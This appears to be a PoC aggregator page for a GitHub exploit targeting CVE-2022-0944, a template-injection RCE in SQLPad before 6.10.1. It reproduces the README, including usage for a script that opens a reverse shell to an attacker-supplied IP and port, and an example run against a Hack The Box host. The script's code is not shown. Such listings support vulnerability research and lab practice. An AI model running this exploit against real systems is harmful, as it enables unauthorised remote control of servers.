CVE-2022-0944 PoC — Template injection in connection test endpoint leads to RCE in sqlpad/sqlpad

Source

https://github.com/Robocopsita/CVE-2022-0944_RCE_POC

Associated Vulnerability

Title:Template injection in connection test endpoint leads to RCE in sqlpad/sqlpad (CVE-2022-0944)
Description:Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1.

Readme

# CVE-2022-0944

Proof of concept exploit for [SQLPad RCE (CVE-2022-0944)](https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb) leading to a RCE with a revershell to the attackers PC.

## Usage

```
usage: script.py URL IP PORT

positional arguments:
  URL         URL to SQLPad
  IP       Listener host address for reverse shell
  PORT       Listener port for reverse shell
```

**Example:**

```bash
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
```

# Disclaimer
This repository contains tools that are intended solely for educational purposes, specifically for use in cybersecurity learning environments. The author of this code assumes no responsibility for any consequences arising from the use, misuse, or modification of this code. The code is provided "as is" without any warranty, either express or implied, including but not limited to the implied warranties of merchantability or fitness for a particular purpose.

File Snapshot


 [4.0K]  /data/pocs/51dd4f1055f003d09b4d02c52552064d3bd42be3
├── [1.0K]  LICENSE
├── [ 964]  README.md
└── [2.5K]  script.py

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!